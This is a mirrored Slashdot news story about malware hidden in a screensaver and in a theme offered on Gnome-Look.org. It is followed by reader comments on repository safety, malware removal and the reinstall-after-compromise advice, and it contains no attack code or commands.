Slashdot Mirror

← Back to Stories (view on slashdot.org)

Malware Found Hidden In Screensaver On Gnome-Look

Posted by timothy on from the sudo-you-know-what-you're-sudoing dept.

AndGodSed writes "OMG! UBUNTU! Reports the following: 'Malware has been found hidden inside an innocuous 'waterfall' screensaver .deb file made available on popular artwork sharing site Gnome-Look.org. The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads. The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially successful, attempt.'" A similar report at Digitizor.com says that similar malware was also found in a theme called Ninja Black. For those affected, both sites also provide instruction on cleansing your system.

8 of 611 comments (clear)

  1. Re:Not more safe by sopssa · · Score: 4, Informative

    But this is not really about vulnerabilities. This is a screensaver that user downloads from a website. Open source or not, you can't fix that unless the whole system is totally locked down like iPhone. And that doesn't really sound good.

  2. Re:Not more safe by sopssa · · Score: 4, Informative

    But so what if it only gets access to one user? Malware doesn't really need root access. Stealing user data and sending spam is just as possible from user base. In history malware tried to just fuck over the computer which would had required root access, but now its just about sending spam or stealing data.

  3. What the summary didn't mention... by AlgorithMan · · Score: 5, Informative

    What the summary didn't mention: the screensaver has been there less than 24 hours.
    see pro-linux.de (german)

    --
    The MAFIAA is a bunch of mindless jerks who will be the first up against the wall when the revolution comes
  4. Re:Repositories! by wizardforce · · Score: 4, Informative

    No one is being locked into the repositories. If they want they can go elsewhere to get their software. The repositories merely provide a reasonably safe set of software available for the user.

    --
    Sigs are too short to say anything truly profound so read the above post instead.
  5. Re:Not more safe by soundguy · · Score: 3, Informative

    Wrong. They may have multiple user ACCOUNTS but most of them are only going to have one actual meat sack (i.e. USER) at the keyboard.

    --
    Nothing worthwhile ever happens before noon
  6. Re:Not more safe by phantomfive · · Score: 4, Informative

    Not by anyone intelligent. The difference between Windows and Linux is how easy it is to remove stuff like this on Linux. It's easy on Linux. Sometimes practically impossible on windows.

    --
    Qxe4
  7. Re:Not more safe by thejynxed · · Score: 3, Informative

    In this day and age, if your machine gets compromised by a virus, trojan, or rootkit, the only sensible thing to do is wipe and reinstall from a known clean backup. It doesn't matter what OS it is. There's no telling what other little friends they brought along that your chosen methods of detection didn't find. It's not really an option anymore to keep on going with a system that was compromised.

    There's also been some evidence of malware that triggers AV software on purpose, and acts as a distraction while the real dirty payload gets delivered silently elsewhere in your system. You are now fooled into thinking your system is clean because your AV caught the distraction virus, completely missing the real one that was also installed.

    --
    @Mindless Drivel: 100% of Twitter posts ever Tweeted.
  8. Re:At least it was fixable. by FreelanceWizard · · Score: 5, Informative

    I'm afraid not. The reason this malware is easy to remove is because it doesn't do anything truly wretched, like patch libc and other applications, install a rootkit kernel module, and the like.

    Having dealt with Linux boxes that have been hit by automatic exploitation tools that go well out of their way to hide their presence, I can tell you that no matter what the operating system, the standard advice holds: once the machine is infected, the only sure way to get it back to a known state is to restore from a backup made prior to the exploitation or to wipe it completely and start over. I should also point out that these machines were rooted through the exploitation of previously-patched vulnerabilities in setuid services -- which is the exact same vector many Windows worms use, including Slammer and Conficker.

    The only difference between the tools I've run into and a full-on worm is that they run at the command of a cracker and scan IP address ranges of his choice. With a bare amount of automation, they could become very successful Linux worms, breaking into all those machines that, say, have old OpenSSH binaries that haven't been patched against its known remotely exploitable vulnerabilities.

    --
    The Freelance Wizard